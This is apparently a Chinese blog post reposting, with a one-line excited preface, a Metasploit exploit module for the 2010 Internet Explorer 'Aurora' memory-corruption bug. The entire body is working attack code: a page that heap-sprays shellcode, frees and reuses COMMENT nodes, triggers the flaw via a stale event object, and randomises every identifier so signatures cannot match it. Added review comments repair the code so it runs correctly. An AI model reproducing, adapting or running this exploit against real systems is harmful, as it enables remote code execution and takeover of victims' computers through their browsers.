Aurora 确定了

看到HDM的这个可以确定了，世界又要开始新的一轮疯狂了。

##
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

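# Metasploit module for the Internet Explorer "Aurora" memory corruption
# (Microsoft Security Advisory 979352).  It serves one HTML page that
# heap-sprays the payload from JavaScript and then repeatedly re-touches a
# stale reference held by an IE-only event object (createEventObject /
# srcElement) until the corrupted pointer lands in the spray.
#
# NOTE(review): the listing this copy came from had lost every "[i]" array
# subscript on the comment-node array (the hosting page renders UBB tags and
# "[i]" is one of them).  Without the subscripts the loop overwrote the array
# variable itself, the later ".length" read was not an array length, and the
# freed nodes were never overwritten.  The subscripts are restored below; the
# duplicated </body></html> at the end of the page was also dropped.
class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::Remote::BrowserAutopwn

        # Browser Autopwn metadata: IE 6 through 8 on Windows, JavaScript
        # required.  There is no client-side probe for this bug, so vuln_test
        # is nil and autopwn simply fires the module at matching browsers.
        autopwn_info({
                :ua_name    => HttpClients::IE,
                :ua_minver  => "6.0",
                :ua_maxver  => "8.0",
                :javascript => true,
                :os_name    => OperatingSystems::WINDOWS,
                :vuln_test  => nil, # no way to test without just trying it
        })

        # Module metadata.  The payload is capped at 1000 bytes and must not
        # contain NUL, since it is embedded in the page as a %u-escaped
        # JavaScript string; the -3500 StackAdjustment presumably moves the
        # stack pointer below the corrupted frame before the payload runs.
        #
        # @param info [Hash] caller-supplied overrides merged by update_info
        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
                        'Description'    => %q{
                                This module exploits a memory corruption flaw in Internet Explorer. This
                        flaw was found in the wild.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'unknown',
                                        'hdm'      # Metasploit port
                                ],
                        'Version'        => '$Revision: 8136 $',
                        'References'     =>
                                [
                                        ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                                        ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "\x00",
                                        'Compat'   =>
                                                {
                                                        'ConnectionType' => '-find',
                                                },
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { }],
                                ],
                        # The advisory above and this file's own $Id are January 2010;
                        # the listing carried "2009", which predates the bug by a year.
                        'DisclosureDate' => 'Jan 14 2010', # wepawet sample
                        'DefaultTarget'  => 0))
        end

        # Handles every request under the module's resource.  A request for
        # "*.gif" is answered with a 1x1 GIF (the <img> whose onload starts the
        # exploit); any other request gets the exploit page with freshly
        # randomised identifiers and a payload regenerated for this client.
        #
        # @param cli     the client connection the response is written to
        # @param request the parsed HTTP request
        def on_request_uri(cli, request)
                if request.uri =~ /\.gif/i
                        # 1x1 GIF, stored base64-encoded; "m*" is base64 decode.
                        data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*").first
                        send_response(cli, data, { 'Content-Type' => 'image/gif' })
                        return
                end

                # Every identifier in the page is random so the served script
                # has no fixed token for a signature to match on.
                var_memory    = rand_text_alpha(rand(100) + 1)
                var_boom      = rand_text_alpha(rand(100) + 1)
                var_x1        = rand_text_alpha(rand(100) + 1)
                var_e1        = rand_text_alpha(rand(100) + 1)
                var_e2        = rand_text_alpha(rand(100) + 1)

                var_comment   = rand_text_alpha(rand(100) + 1)
                var_abc       = rand_text_alpha(3)

                var_ev1       = rand_text_alpha(rand(100) + 1)
                var_ev2       = rand_text_alpha(rand(100) + 1)
                var_sp1       = rand_text_alpha(rand(100) + 1)

                var_unescape  = rand_text_alpha(rand(100) + 1)
                var_shellcode = rand_text_alpha(rand(100) + 1)
                var_spray     = rand_text_alpha(rand(100) + 1)
                var_start     = rand_text_alpha(rand(100) + 1)
                var_i         = rand_text_alpha(rand(100) + 1)

                # The script is deliberately kept free of comments (they would be
                # served to the target).  What it does, in order:
                #  * creates 200 COMMENT nodes and keeps them in an array;
                #  * on <img onload>: %u-decodes the payload, doubles a
                #    "%u0c0d%u0c0d" string until it is 0xd0000 chars long and
                #    keeps 100 copies of spray+shellcode alive in an array;
                #  * wraps the load event in an IE event object, empties the
                #    span that holds the <img>, and every 50 ms overwrites each
                #    comment node's data with \u0c0d and reads evt.srcElement.
                #    The srcElement read through the stale reference is the
                #    trigger; presumably the corrupted pointer resolves into the
                #    0x0c0d0c0d spray - not verifiable from this file alone.
                html = %Q|<html>
<head>
<script>

        var #{var_comment} = "COMMENT";

        var #{var_x1} = new Array();
        for (i = 0; i < 200; i ++ ){
           #{var_x1}[i] = document.createElement(#{var_comment});
           #{var_x1}[i].data = "#{var_abc}";
        };

        var #{var_e1} = null;

        var #{var_memory} = new Array();
        var #{var_unescape} = unescape;

        function #{var_boom}() {

                var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

                var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

                do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

                for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
        }

        function #{var_ev1}(evt){
                #{var_boom}();
            #{var_e1} = document.createEventObject(evt);
            document.getElementById("#{var_sp1}").innerHTML = "";
            window.setInterval(#{var_ev2}, 50);
        }

        function #{var_ev2}(){
          p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
          for (i = 0; i < #{var_x1}.length; i ++ ){
              #{var_x1}[i].data = p;
          }

          var t = #{var_e1}.srcElement;
        }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span>

</body>
</html>
                |

                # Plain (uncompressed) HTML; no-cache so a retry fetches a page
                # with a fresh payload and fresh identifiers.
                send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

                # Hand the connection to the payload handler.
                handler(cli)
        end
end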
